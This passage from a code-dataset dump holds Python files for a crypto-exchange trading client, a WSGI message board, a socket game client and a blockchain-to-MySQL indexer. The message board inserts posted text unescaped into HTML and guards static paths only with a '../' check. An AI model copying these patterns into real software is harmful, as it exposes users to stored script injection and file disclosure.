str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n return\n except QuoineAPIException as e:\n logger().error('Failed to cancel order with error: {}'.format(e))\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'reason': 'Unknown exception type',\n 'base': base,\n 'quote': quote,\n 'exchange': self.name,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n # If it fails due to \"already closed\" or \"not found\", then popping is fine\n # TODO - If it fails due to a rate limit, we probably don't want this here?\n self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n return\n\n 
self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n\n time.sleep(2)\n\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCELED',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'CANCELED',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n\n def get_withdrawals(self, currency):\n raise NotImplementedError('Qryptos does not have a get_withdrawals function in their API')\n\n def can_deposit(self, currency):\n return False\n\n def get_deposits(self, currency=None):\n raise NotImplementedError('Qryptos does not have a get_deposits function in their API')\n\n def get_order_book(self, base, quote):\n product_id = self.get_product_id(base, quote)\n book = self.client.get_order_book(product_id, full=True)\n book['bids'] = book['buy_price_levels']\n book['asks'] = book['sell_price_levels']\n book.pop('buy_price_levels', None)\n book.pop('sell_price_levels', None)\n\n book['base'] = base\n book['quote'] = quote\n book['exchange'] = self.name\n\n return book\n\n def get_balances(self):\n balances = self.client.get_account_balances()\n\n internal_balances_format = []\n\n for balance in balances:\n internal_balances_format.append({\n 'asset': balance['currency'],\n 'free': Decimal(str(balance['balance'])),\n 'locked': Decimal(0)\n })\n\n self.notify_callbacks('account', account_type='balance', data=internal_balances_format)\n\n return internal_balances_format\n\n def create_order(self, base, quote, price, quantity, side, order_type, internal_order_id, request_id=None,\n requester_id=None, **kwargs):\n product_id = self.get_product_id(base, quote)\n if product_id is None:\n raise LookupError('Could not find a product with a base [{}] and quote [{}]'.format(base, quote))\n\n try:\n exchange_side = self.client.SIDE_BUY if str.lower(side) == 'buy' else self.client.SIDE_SELL\n response = self.client.create_order(order_type, product_id, exchange_side, str(quantity), price=str(price))\n\n if ('message' in response and len(response['message']) > 0) or \\\n ('errors' in response and len(response['errors']) > 0):\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CREATE_FAILED',\n 'reason': 'Unknown exception type',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'internal_order_id': str(internal_order_id),\n 'side': side,\n 'quantity': quantity,\n 'price': price,\n 'cum_quantity_filled': 0,\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n except QuoineAPIException as e:\n logger().error('Failed to create order due to error: {}'.format(e))\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CREATE_FAILED',\n 'reason': 'Unknown exception type',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'internal_order_id': str(internal_order_id),\n 'side': side,\n 'quantity': quantity,\n 'price': price,\n 'cum_quantity_filled': 0,\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n\n self.internal_to_external_id[str(internal_order_id)] = str(response['id'])\n self.external_to_internal_id[str(response['id'])] = str(internal_order_id)\n\n internal_response = {\n 'action': 'CREATED',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(response['id']),\n 'internal_order_id': 
str(internal_order_id),\n 'side': side,\n 'quantity': Decimal(str(quantity)),\n 'price': Decimal(str(price)),\n 'cum_quantity_filled': Decimal('0'),\n 'order_status': 'OPEN',\n 'server_ms': response['created_at'] * 1000,\n 'received_ms': int(round(time.time() * 1000))\n }\n self.open_orders_by_exchange_id[str(response['id'])] = internal_response\n self.notify_callbacks('trade_lifecycle', data=internal_response)\n\n def get_open_orders_by_side_and_price(self):\n open_orders_by_side_and_price = {'bids': {}, 'asks': {}}\n\n for order in self.open_orders_by_exchange_id.values():\n if order['side'] == 'buy':\n if Decimal(order['price']) in open_orders_by_side_and_price['bids']:\n open_orders_by_side_and_price['bids'][Decimal(order['price'])] \\\n = open_orders_by_side_and_price['bids'][order['price']] + \\\n order['quantity'] - order['cum_quantity_filled']\n else:\n open_orders_by_side_and_price['bids'][Decimal(order['price'])] = order['quantity'] - \\\n order['cum_quantity_filled']\n elif order['side'] == 'sell':\n if Decimal(order['price']) in open_orders_by_side_and_price['asks']:\n open_orders_by_side_and_price['asks'][Decimal(order['price'])] \\\n = open_orders_by_side_and_price['asks'][order['price']] + \\\n order['quantity'] - order['cum_quantity_filled']\n else:\n open_orders_by_side_and_price['asks'][Decimal(order['price'])] = order['quantity'] - \\\n order['cum_quantity_filled']\n\n return open_orders_by_side_and_price\n\n def get_product_id(self, base, quote):\n symbol = str.upper(base) + str.upper(quote)\n if symbol in self.symbol_to_product:\n return self.symbol_to_product[symbol]\n else:\n return None\n\n def cancel_all(self, base, quote):\n product_id = self.get_product_id(base, quote)\n live_orders = self.client.get_orders(product_id=product_id, status='live')\n partially_filled_orders = self.client.get_orders(product_id=product_id, status='partially_filled')\n orders = live_orders['models'] + partially_filled_orders['models']\n\n for order in orders:\n try:\n self.client.cancel_order(order['id'])\n except Exception as e:\n logger().error('Failed to cancel order with error: {}'.format(str(e)))\n\n time.sleep(2)\n\n # Qryptos exchange fees are always paid in the quote currency\n # TODO - Use self.client.get_my_executions (with limit 1000) instead. 
Should be far faster\n def get_fees_paid(self, base, quote, start_s, end_s):\n if start_s > end_s:\n logger().error('Start time cannot be after end time')\n return Decimal(0)\n\n product_id = self.get_product_id(base, quote)\n response = self.client.get_orders(product_id=product_id, limit=100)\n # Find start page via binary search\n\n total_pages = self.find_actual_total_pages(product_id, response['total_pages'], response['total_pages'] + 1, 0)\n\n first_page = self.find_first_or_last_page_of_orders(product_id, int(total_pages / 2), start_s, end_s, 'first',\n total_pages)\n if first_page == -1:\n logger().warn('Unable to find any orders on or after epoch time: {}'.format(start_s))\n return Decimal('0')\n\n last_page = self.find_first_or_last_page_of_orders(product_id, int(total_pages / 2), start_s, end_s, 'last',\n total_pages)\n if last_page == -1:\n logger().warn('Unable to find any orders on or before epoch time: {}'.format(end_s))\n return Decimal('0')\n\n # Request all pages in range [start, end]\n orders_in_range_with_fills = []\n for page in range(first_page, last_page + 1):\n response = self.client.get_orders(product_id=product_id, page=page, limit=100)\n orders = response['models']\n for order in orders:\n if start_s <= order['created_at'] <= end_s and order['filled_quantity'] != '0.0':\n orders_in_range_with_fills.append(order)\n\n fees_in_quote_currency = Decimal('0')\n for order in orders_in_range_with_fills:\n # order_fee arrives as a string/float; convert before summing\n fees_in_quote_currency += Decimal(str(order['order_fee']))\n\n return fees_in_quote_currency\n\n def find_actual_total_pages(self, product_id, page_to_check, last_blank_page_seen, highest_non_blank_page_seen):\n response = self.client.get_orders(product_id=product_id, page=page_to_check, limit=100)\n orders = response['models']\n\n if len(orders) > 0:\n if last_blank_page_seen - page_to_check == 1:\n return page_to_check\n else:\n highest_non_blank_page_seen = page_to_check\n next_page_to_check = int((page_to_check + last_blank_page_seen) / 2)\n return self.find_actual_total_pages(product_id, next_page_to_check,\n last_blank_page_seen, highest_non_blank_page_seen)\n else:\n last_blank_page_seen = page_to_check\n next_page_to_check = int((highest_non_blank_page_seen + last_blank_page_seen) / 2)\n return self.find_actual_total_pages(product_id, next_page_to_check, last_blank_page_seen,\n highest_non_blank_page_seen)\n
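\n # Worked example for find_actual_total_pages (illustrative numbers): if the\n # exchange reports 9 total pages but only pages 1-7 contain orders, the\n # probes go 9 (blank) -> 4 -> 6 -> 7 -> 8 (blank) -> 7, returning 7 once the\n # lowest blank page seen is exactly one past a non-blank probe.\n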
\n def find_first_or_last_page_of_orders(self, product_id, current_page, start_s, end_s, first_or_last, total_pages):\n if first_or_last == 'first':\n first_page = -1\n while True:\n response = self.client.get_orders(product_id=product_id, page=current_page, limit=100)\n orders = response['models']\n matched = False\n for order in orders:\n # Have to use created_at instead of updated_at as appears to be sorted by created_at\n created_at_s = order['created_at']\n if created_at_s <= end_s:\n matched = True\n break\n\n if matched:\n first_page = current_page\n next_page = int(current_page / 2)\n else:\n if first_page - current_page == 1 or first_page == current_page:\n return first_page\n elif current_page == 0:\n return -1\n else:\n next_page = int((current_page + first_page) / 2)\n\n if next_page == current_page:\n return first_page\n else:\n current_page = next_page\n else:\n last_page = -1\n\n while True:\n response = self.client.get_orders(product_id=product_id, page=current_page, limit=100)\n orders = response['models']\n matched = False\n for order in orders:\n created_at_s = order['created_at']\n if created_at_s >= start_s:\n matched = True\n break\n\n if matched:\n last_page = current_page\n next_page = int((current_page + total_pages) / 2)\n else:\n if current_page == last_page + 1 or current_page == last_page:\n return last_page\n elif current_page == total_pages - 1:\n return -1 # If we're on the last page and still don't have a match, it doesn't exist\n else:\n next_page = int((current_page + last_page) / 2)\n\n if next_page == current_page:\n return last_page\n else:\n current_page = next_page\n\n def get_deposit_address(self, currency):\n raise NotImplementedError('Qryptos does not have a deposit function in their API')\n\n\nif __name__ == '__main__':\n def callback(data_type, data, **unused):\n print(data_type)\n print(data)\n\n\n creds = get_creds()\n q = QryptosService('qryptos', public_key=creds['qryptos_pub_prod'], private_key=creds['qryptos_priv_prod'])\n\n import csv\n\n trades = q.client.get_executions(q.get_product_id('UBT', 'ETH'), 1000, 1)\n trades = trades['models']\n trades_to_delete = []\n i = 0\n for trade in trades:\n # 1535673600 31 Aug midnight gmt\n # 1536278400 7 September midnight gmt\n if trade['created_at'] > 1536278400 or trade['created_at'] < 1535673600:\n trades_to_delete.append(i)\n i += 1\n\n for index in reversed(trades_to_delete):\n trades.pop(index)\n\n keys = trades[0].keys()\n\n with open('qryptos_executions_ours.csv', 'w') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(trades)\n\n\n\n # order = q.client.get_order('85966628')\n # q.get_fees_paid('UBT', 'ETH', 0, 99999999999)\n # q.get_balances()\n # q.follow_market('ETH', 'BTC')\n # q.cancel_all('ETH', 'BTC')\n # price then qty\n # balances = q.get_balances()\n # print(balances)\n # q.create_order('ETH', 'BTC', '0.0452', '0.1', 'sell', 'limit', 'an_id', request_id='rid_1')\n # q.cancel_order('ETH', 'BTC', 'internal_id', 'request_id', exchange_order_id='81422113')\n","sub_path":"exchanges/qryptos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"81633363","text":"import wsgiref.validate\nfrom tempfile import TemporaryFile\nimport cgi\nimport os\n\nfrom utils import parse_http_x_www_form_urlencoded_post_data, \\\n get_first_element, parse_http_get_data, parse_http_headers, \\\n parse_http_content_type, parse_http_uri\n\nDEBUG = True\nSTATIC_URL = '/static/'\nSTATIC_ROOT = 'data'\n\ndata_messages = [\n b'Name: user<br>Message: hi!',
\n b'Name: user<br>Message: hi!',\n]
\n#import wsgiref.util\n#wsgiref.util.FileWrapper().filelike()\n\ndef read(environ):\n length = int(environ.get('CONTENT_LENGTH', 0))\n stream = environ['wsgi.input']\n body = TemporaryFile(mode='w+b')\n while length > 0:\n part = stream.read(min(length, 1024*200)) # 200KB buffer size\n if not part: break\n body.write(part)\n length -= len(part)\n body.seek(0)\n environ['wsgi.input'] = body\n return body\n
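\n# Example (illustrative): for a 500 KiB upload, read() above copies the\n# wsgi.input stream into a TemporaryFile in 200 KiB slices (three reads) and\n# rewinds it, so cgi.FieldStorage can parse the body without re-reading the\n# socket.\n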
\n@wsgiref.validate.validator\ndef application(environ, start_response):\n # https://www.python.org/dev/peps/pep-3333/#environ-variables\n REQUEST_METHOD = environ['REQUEST_METHOD']\n CONTENT_TYPE, CONTENT_TYPE_KWARGS = parse_http_content_type(environ)\n SERVER_PROTOCOL = environ['SERVER_PROTOCOL']\n HEADERS = parse_http_headers(environ)\n URI_PATH = environ['PATH_INFO']\n URI_QUERY = environ['QUERY_STRING']\n URI = parse_http_uri(environ)\n POST = parse_http_x_www_form_urlencoded_post_data(environ)\n GET = parse_http_get_data(environ)\n\n status = '200 OK'\n headers = [('Content-type', 'text/html; charset=utf-8')]\n\n if URI_PATH == '/favicon.ico':\n status = '404 Not Found'\n start_response(status, headers)\n return [b'']\n print(environ)\n if DEBUG:\n print(\"{REQUEST_METHOD} {URI_PATH}?{URI_QUERY} {SERVER_PROTOCOL}\\n\"\n \"CONTENT_TYPE: {CONTENT_TYPE}; {CONTENT_TYPE_KWARGS}\\n\"\n \"POST: {POST}\\n\"\n \"GET: {GET}\\n\"\n \":HEADERS:\\n{HEADERS}\\n\"\n .format(**locals()))\n\n if URI_PATH == \"/upload\":\n status = '303 See Other'\n headers.append(('Location', '/'))\n body = read(environ)\n form = cgi.FieldStorage(fp=body, environ=environ, keep_blank_values=True)\n try:\n fileitem = form['file']\n except KeyError:\n fileitem = None\n if fileitem is not None and fileitem.file is not None:\n fn = os.path.basename(fileitem.filename)\n with open(\"data/\" + fn, 'wb') as f:\n data = fileitem.file.read(1024)\n while data:\n f.write(data)\n data = fileitem.file.read(1024)\n\n start_response(status, headers)\n return [b'']\n\n if URI_PATH.startswith(STATIC_URL):\n path = URI_PATH.split(STATIC_URL)[-1]\n if \"../\" in path:\n status = '404 Not Found'\n start_response(status, headers)\n return [b'']\n\n with open(STATIC_ROOT + \"/\" + path, 'rb') as f:\n start_response(status, [('Content-type', 'application/octet-stream; charset=utf-8')])\n return [f.read()]\n\n\n\n with open('main.html', 'rb') as f:\n template_bytes = f.read()\n\n if REQUEST_METHOD == 'POST':\n status = '303 See Other'\n headers.append(('Location', '/'))\n name = get_first_element(POST, 'name', '')\n message = get_first_element(POST, 'message', '')\n data_message_text = \"Name: {0}<br>Message: {1}\".format(name, message)\n data_message_bytes = data_message_text.encode('utf-8')\n data_messages.append(data_message_bytes)\n start_response(status, headers)\n return [b'']\n\n messages = b'<br>'.join(data_messages)\n template_bytes = template_bytes.replace(b'{{messages}}', messages)\n\n start_response(status, headers)\n return [template_bytes]\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"433044469","text":"# -*- coding: utf-8 -*-\nimport json\nimport socket\nimport threading\nimport messages\nimport model\nimport view\n\nBUFFER_SIZE = 2 ** 10\n\n\nclass Application(object):\n instance = None\n\n def __init__(self, args):\n self.args = args\n self.closing = False\n self.host = None\n self.port = None\n self.receive_worker = None\n self.sock = None\n self.username = None\n self.ui = view.UI(self)\n Application.instance = self\n\n def execute(self):\n \"\"\"\n Method called at the very start of the client launch\n \"\"\"\n if not self.ui.show():\n return # if the UI failed to render, we end up here\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.sock.connect((self.host, self.port))\n except (socket.error, OverflowError):\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n return\n self.first_hello_message()\n self.receive_worker = threading.Thread(target=self.receive)\n self.receive_worker.start()\n self.ui.loop()\n\n def first_hello_message(self):\n \"\"\"\n The client sends the server an empty message carrying only this client's name,\n so that the server notifies everyone else about the new player.\n The server then broadcasts the updated score, taking the new player into account\n \"\"\"\n message = model.Message(username_last_player=self.username)\n try:\n self.sock.sendall(message.marshal()) # send the message to the server through the socket\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def receive(self):\n \"\"\"\n Method that uses receive_all to obtain a Message object holding the data\n we need. At the end it calls the show_message(message) method defined in the UI class\n \"\"\"\n while True:\n try:\n message = model.Message(**json.loads(self.receive_all()))\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n return\n self.ui.show_message(message)\n
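\n # Framing sketch (assuming model.END_CHARACTER is a single terminator\n # character such as '\\0'): each message travels as JSON text followed by\n # the terminator, e.g. '{\"username_last_player\": \"bob\", \"quit\": true}'\n # plus END_CHARACTER; receive_all below accumulates BUFFER_SIZE chunks\n # until that terminator arrives.\n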
\n def receive_all(self):\n \"\"\"\n Method that keeps reading chunks of up to BUFFER_SIZE from the socket\n until it receives the character marking the end of transmission\n \"\"\"\n buffer = \"\"\n while not buffer.endswith(model.END_CHARACTER):\n buffer += self.sock.recv(BUFFER_SIZE).decode(model.TARGET_ENCODING)\n return buffer[:-1]\n\n def add_number(self):\n \"\"\"\n Method called when the client presses the add button\n \"\"\"\n message = model.Message(username_last_player=self.username, quit=False)\n\n self.ui.add_number_button['state'] = 'disabled'\n self.ui.end_game_button['state'] = 'disabled'\n try:\n self.sock.sendall(message.marshal())\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def end_game_for_this_client(self):\n \"\"\"\n Method called when the client presses the end button\n \"\"\"\n message = model.Message(username_last_player=self.username, quit=True)\n self.ui.add_number_button['state'] = 'disabled'\n self.ui.end_game_button['state'] = 'disabled'\n try:\n self.sock.sendall(message.marshal())\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def exit(self):\n \"\"\"\n Method originally called to disconnect the current client from the chat\n \"\"\"\n self.closing = True\n try:\n self.sock.sendall(model.Message(username=self.username, message=\"\", quit=True).marshal())\n except (ConnectionResetError, ConnectionAbortedError, OSError):\n print(messages.CONNECTION_ERROR)\n finally:\n self.sock.close()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"113052263","text":"# The app listens for new blocks as they are written, reads the extrinsics and stores the transactions in a mysql/mariadb database.\n# the database must be created in advance; the app will create the tables and indexes used.\n# import libraries\n# system packages\nimport sys\nimport os\nimport json\n# Substrate module\nfrom substrateinterface import SubstrateInterface, Keypair,ExtrinsicReceipt\nfrom substrateinterface.exceptions import SubstrateRequestException\n# base64 encoder/decoder\nimport base64\n# base58 encoder/decoder\nimport base58\n#import scale library to load data types\nimport scalecodec\n# import mysql connector\nimport mysql.connector\ncurrentime=\"\"\n\n# read environment variables\ntry:\n DB_NAME=os.environ['DB_NAME']\n DB_USER=os.environ['DB_USER']\n DB_PWD=os.environ['DB_PWD']\n DB_HOST=os.environ['DB_HOST']\n NODE=os.environ['NODE']\n\nexcept KeyError:\n print(\"System Variables have not been set\")\n exit(1)\n\n\n# function to load data types registry\ndef load_type_registry_file(file_path: str) -> dict:\n with open(os.path.abspath(file_path), 'r') as fp:\n data = fp.read()\n return json.loads(data)\n# function to create tables required\ndef create_tables():\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n cursor = cnx.cursor()\n \n # use database\n try:\n
cursor.execute(\"USE {}\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Database {} does not exists.\".format(DB_NAME))\n print(err)\n exit(1)\n # create tables\n createtx=\"CREATE TABLE `transactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,`txhash` VARCHAR(66) NOT NULL, \\\n `sender` VARCHAR(64) NOT NULL, `recipient` VARCHAR(64) NOT NULL, \\\n `amount` numeric(32,0) NOT NULL, \\\n `gasfees` numeric(32,0) NOT NULL, \\\n `dtblockchain` DATETIME NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table TRANSACTIONS...\")\n cursor.execute(createtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'transactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # create indexes\n createidxtx=\"CREATE INDEX txhash on transactions(txhash)\"\n try:\n print(\"Creating index TXHASH on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'txhash'\"):\n print(err.msg)\n else:\n print(\"OK\")\n createidxtx=\"CREATE INDEX sender on transactions(sender)\"\n try:\n print(\"Creating index SENDER on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'sender'\"):\n print(err.msg)\n else:\n print(\"OK\")\n createidxtx=\"CREATE INDEX recipient on transactions(recipient)\"\n try:\n print(\"Creating index RECIPIENT on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'recipient'\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating sync table to keep syncronisation info\n createsync=\"CREATE TABLE `sync` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `lastblocknumberverified` INT(11) NOT NULL, \\\n `lastapprovalrequestprocessed` int(11) default 0 not null,\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table SYNC...\")\n cursor.execute(createsync)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'sync' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating categories table for impact actions\n createcategories=\"CREATE TABLE `impactactionscategories` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(64) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionscategories...\")\n cursor.execute(createcategories)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionscategories' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactions table for impact actions\n createactions=\"CREATE TABLE `impactactions` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `category` INT(11) NOT NULL,`auditors` INT(11) NOT NULL,`blockstart` INT(11) NOT NULL,\\\n `blockend` INT(11) NOT NULL, `rewardstoken` INT(11) NOT NULL, `rewardsamount` INT(32) NOT NULL,\\\n `rewardsoracle` INT(32) NOT NULL,`rewardauditors` INT(32) NOT NULL,\\\n `slashingsauditors` INT(32) NOT NULL,`maxerrorsauditor` INT(11) NOT NULL,\\\n `fields` varchar(8192) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), \\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table 
impactactions...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsoracles table for impact actions\n createactions=\"CREATE TABLE `impactactionsoracles` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsoracles...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsoracles' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsauditors table for impact actions\n createactions=\"CREATE TABLE `impactactionsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL,`categories` VARCHAR(128) NOT NULL,\\\n `area` VARCHAR(64) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsauditors...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsauditors' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsproxy table for impact actions\n createactions=\"CREATE TABLE `impactactionsproxy` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsproxy...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsproxy' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequests table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequests` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `info` VARCHAR(8192) NOT NULL,\\\n `dtapproved` DATETIME,\\\n `dtrefused` DATETIME,\\\n CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsapprovalrequests...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequests' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequestsauditors table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequestsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `approvalrequestid` int(11) NOT NULL,\\\n `auditor` VARCHAR(48) NOT NULL,\\\n `maxdays` INT(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table 
impactactionsapprovalrequestsauditors...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequestsauditors' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequestvotes table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequestauditorvotes` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `approvalrequestid` int(11) NOT NULL,\\\n `vote` VARCHAR(1) NOT NULL,\\\n `otherinfo` VARCHAR(66) NOT NULL,\\\n `dtrewards` DATETIME NOT NULL,\\\n CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsapprovalrequestauditorvotes...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequestauditorvotes' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating assets table for FT\n createassets=\"CREATE TABLE `ftassets` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `assetid` int(11) NOT NULL,\\\n `owner` VARCHAR(48) NOT NULL,\\\n `maxzombies` int(11) NOT NULL,\\\n `minbalance` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table ftassets...\")\n cursor.execute(createassets)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'ftassets' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating transaction for fungible tokens\n createassets=\"CREATE TABLE `fttransactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `sender` VARCHAR(48) NOT NULL,\\\n `category` VARCHAR(20) NOT NULL,\\\n `assetid` int(11) NOT NULL,\\\n `recipient` VARCHAR(48) NOT NULL,\\\n `amount` int(11) NOT NULL, 